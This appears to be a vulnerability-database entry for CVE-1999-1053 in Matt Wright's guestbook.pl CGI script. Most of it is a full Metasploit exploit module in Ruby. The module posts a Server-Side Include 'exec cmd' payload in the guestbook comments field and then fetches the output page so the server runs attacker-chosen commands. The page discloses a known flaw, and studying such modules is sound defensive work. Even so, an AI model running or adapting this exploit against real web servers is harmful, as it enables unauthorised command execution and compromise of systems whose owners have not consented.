Matt Wright guestbook.pl Arbitrary Command Execution

🗓️ 01 Jul 2014 00:00:00Reported by RootType

The Matt Wright guestbook.pl v2.3.1 CGI script allows arbitrary command execution when HTML posting is enabled and the Server-Side Include (SSI) script handler is enabled for '.html' file type


                                                ##
# $Id: guestbook_ssi_exec.rb 9671 2010-07-03 06:21:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require &#39;msf/core&#39;


class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;Matt Wright guestbook.pl Arbitrary Command Execution&#39;,
			&#39;Description&#39;    =&#62; %q{
				The Matt Wright guestbook.pl &#60;= v2.3.1 CGI script contains
				a flaw that may allow arbitrary command execution. The vulnerability
				requires that HTML posting is enabled in the guestbook.pl script, and
				that the web server must have the Server-Side Include (SSI) script
				handler enabled for the &#39;.html&#39; file type. By combining the script
				weakness with non-default server configuration, it is possible to exploit
				this vulnerability successfully.
			},
			&#39;Author&#39;         =&#62; [ &#39;patrick&#39; ],
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision: 9671 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;1999-1053&#39; ],
					[ &#39;OSVDB&#39;, &#39;84&#39; ],
					[ &#39;BID&#39;, &#39;776&#39; ],
				],
			&#39;Privileged&#39;     =&#62; false,
			&#39;Payload&#39;        =&#62;
				{
					&#39;DisableNops&#39; =&#62; true,
					&#39;Space&#39;       =&#62; 1024,
					&#39;Compat&#39;      =&#62;
						{
							&#39;PayloadType&#39; =&#62; &#39;cmd&#39;,
							&#39;RequiredCmd&#39; =&#62; &#39;generic perl ruby bash telnet&#39;,
						}
				},
			&#39;Platform&#39;       =&#62; [ &#39;unix&#39;, &#39;win&#39;, &#39;linux&#39; ],
			&#39;Arch&#39;           =&#62; ARCH_CMD,
			&#39;Targets&#39;        =&#62; [[ &#39;Automatic&#39;, { }]],
			&#39;DisclosureDate&#39; =&#62; &#39;Nov 05 1999&#39;,
			&#39;DefaultTarget&#39;  =&#62; 0))

			register_options(
				[
					OptString.new(&#39;URI&#39;, [true, &#34;guestbook.pl script path&#34;, &#34;/cgi-bin/guestbook.pl&#34;]),
					OptString.new(&#39;URIOUT&#39;, [true, &#34;guestbook.html output&#34;, &#34;/guestbook/guestbook.html&#34;]),
				], self.class)
	end

	def exploit
		realname	= rand_text_alphanumeric(20)
		email		= rand_text_alphanumeric(20)
		city		= rand_text_alphanumeric(20)
		state		= rand_text_alphanumeric(20)
		country 	= rand_text_alphanumeric(20)

		sploit = Rex::Text.uri_encode(&#34;&#60;!--#exec cmd=\&#34;&#34; + payload.encoded.gsub(&#39;&#34;&#39;,&#39;\&#34;&#39;) + &#34;\&#34;&#34;, &#39;hex-normal&#39;)

		req1 = send_request_cgi({
			&#39;uri&#39;     =&#62; datastore[&#39;URI&#39;],
			&#39;method&#39;  =&#62; &#39;POST&#39;,
			&#39;data&#39;    =&#62; &#34;realname=#{realname}&username=#{email}&city=#{city}&state=#{state}&country=#{country}&comments=#{sploit}&#34;,
		}, 25)

		req2 = send_request_raw({
			&#39;uri&#39;     =&#62; datastore[&#39;URIOUT&#39;],
		}, 25)

	end
end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1